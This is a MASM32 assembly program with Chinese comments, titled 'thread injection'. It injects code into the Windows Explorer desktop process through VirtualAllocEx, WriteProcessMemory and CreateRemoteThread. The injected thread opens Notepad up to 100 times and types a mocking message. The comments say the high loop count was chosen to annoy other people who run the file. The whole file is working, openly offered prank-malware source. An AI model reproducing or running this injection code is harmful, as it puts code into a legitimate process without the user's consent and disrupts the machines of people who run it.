线程注入
;本程序是学习线程注入后写的一个实验程序,远程线程中有个变量控制次数,请改成一个小的数字,否则要循环100次的,;还有,最好把里面的szDesktopWindow,szDesktopClass改成另外一个宿主,这样调试起来容易.
;之所以写这个,主要是含笑说没后台的线程注入没意思,于是这写了这个,结果,害没害人我不知道,只是我知道,据某某人说CPU烧到120度.
;因为我想害下人,所以让线程一直循环^^自己嘛,循环三次就OK了,别人嘛,100次!
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib
include user32.inc
includelib user32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
lpLoadLibrary dd ?
lpGetProcAddress dd ?
lpGetModuleHandle dd ?
lpWinExec dd ?
dwProcessID dd ?
dwThreadID dd ?
hProcess dd ?
lpRemoteCode dd ?
.const
szErrOpen db '无法打开远程线程!',0
;
szDesktopClass db 'Progman',0
szDesktopWindow db 'Program Manager',0
szDllKernel db 'Kernel32.dll',0
szLoadLibrary db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
szGetModuleHandle db 'GetModuleHandleA',0
szWinExec db 'WinExec',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Sample code for < Win32ASM Programming 2nd Edition>
; by 罗云彬, http://asm.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 将参数列表的顺序翻转
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
reverseArgs macro arglist:VARARG
local txt,count
txt TEXTEQU <>
count = 0
for i,<arglist>
count = count + 1
txt TEXTEQU @CatStr(i,<!,>,<%txt>)
endm
if count GT 0
txt SUBSTR txt,1,@SizeStr(%txt)-1
endif
exitm txt
endm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 建立一个类似于 invoke 的 Macro
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_invoke macro _Proc,args:VARARG
local count
count = 0
% for i,< reverseArgs( args ) >
count = count + 1
push i
endm
call dword ptr _Proc
endm
.code
;线程注入开始地方
REMOTE_CODE_START equ this byte
_lpLoadLibrary dd ?
_lpGetProcAddress dd ?
_lpGetModuleHandle dd ?
_lpWinExec dd ?
_lpFindWindowA dd ?
_lpChildWindowFromPoint dd ?
_lpSetWindowTextA dd ?
_lpPostMessageA dd ?
_szFindWindowA db 'FindWindowA',0
_szChildWindowFromPoint db 'ChildWindowFromPoint', 0
_szSetWindowTextA db 'SetWindowTextA',0
_szPostMessageA db 'PostMessageA',0,0
_szUserDll db 'User32.dll',0
_hInstance dd ?
_szHaha db '哈哈,你中招了',0
_szExecFile db 'NotePad.exe',0
_szClassName db 'NotePad',0
_szInfo db 0ah,0ah,'没看源程序就运行这个,你就是傻瓜!!自己想个办法终止这个窗口吧,记事本会弹很多次的哦!当然傻瓜才会重启',0
_RemoteThread proc uses ebx edi esi ecx edx lParam
local @hWnd,@bRedraw,@dwLoopCount,@hWinEdit
local @hModule
call @F
@@:
pop ebx
sub ebx,offset @B
_invoke [ebx+_lpGetModuleHandle],NULL
mov [ebx+_hInstance],eax
lea edx,[ebx+offset _szUserDll]
_invoke [ebx+_lpGetModuleHandle],edx
mov @hModule,eax
lea esi,[ebx+offset _szFindWindowA]
lea edi,[ebx+offset _lpFindWindowA]
.while TRUE
_invoke [ebx+offset _lpGetProcAddress],@hModule,esi
mov [edi],eax
add edi,4
@@:
lodsb
or al,al
jnz @B
.break .if !BYTE ptr [esi]
.endw
;by 忘情水 start
mov @dwLoopCount,100
.while @dwLoopCount
lea edx,[ebx+offset _szClassName]
push NULL
push edx
call [ebx+offset _lpFindWindowA]
.if !eax
lea esi,[ebx+offset _szExecFile]
push SW_SHOWNORMAL
push esi
call [ebx+offset _lpWinExec]
mov @bRedraw,1
jmp @loop
.endif
mov @hWnd,eax
.if !@bRedraw
jmp @loop
.endif
push 51
push 20
push @hWnd
call [ebx+offset _lpChildWindowFromPoint]
.if eax
mov @hWinEdit,eax
lea esi,[ebx+_szHaha]
push esi
push @hWnd
call [ebx+_lpSetWindowTextA]
lea eax,[ebx+offset _szInfo]
mov esi,eax
@@:
lodsb
test al,al
jz @F
movzx eax,al
push 1
push eax
push WM_CHAR
push @hWinEdit
call [ebx+_lpPostMessageA]
jmp @B
@@:
dec @dwLoopCount
mov @bRedraw,0
.endif
@loop:
.endw
ret
;by 忘情水 end
_RemoteThread endp
REMOTE_CODE_END equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - REMOTE_CODE_START
start:
invoke GetModuleHandle,addr szDllKernel
mov ebx,eax
invoke GetProcAddress,ebx,offset szLoadLibrary
mov lpLoadLibrary,eax
invoke GetProcAddress,ebx,offset szGetProcAddress
mov lpGetProcAddress,eax
invoke GetProcAddress,ebx,offset szGetModuleHandle
mov lpGetModuleHandle,eax
invoke GetProcAddress,ebx,offset szWinExec
mov lpWinExec,eax
;********************************************************************
; 查找文件管理器窗口并获取进程ID,然后打开进程
;********************************************************************
invoke FindWindow,NULL,addr szDesktopWindow
invoke GetWindowThreadProcessId,eax,offset dwProcessID
mov dwThreadID,eax
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or \
PROCESS_VM_WRITE,FALSE,dwProcessID
.if eax
mov hProcess,eax
;********************************************************************
; 在进程中分配空间并将执行代码拷贝过去,然后创建一个远程线程
;********************************************************************
invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITE
.if eax
mov lpRemoteCode,eax
invoke WriteProcessMemory,hProcess,lpRemoteCode,\
offset REMOTE_CODE_START,REMOTE_CODE_LENGTH,NULL
invoke WriteProcessMemory,hProcess,lpRemoteCode,\
offset lpLoadLibrary,sizeof dword * 4,NULL
mov eax,lpRemoteCode
add eax,offset _RemoteThread - offset REMOTE_CODE_START
invoke CreateRemoteThread,hProcess,NULL,0,eax,0,0,NULL
invoke CloseHandle,eax
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
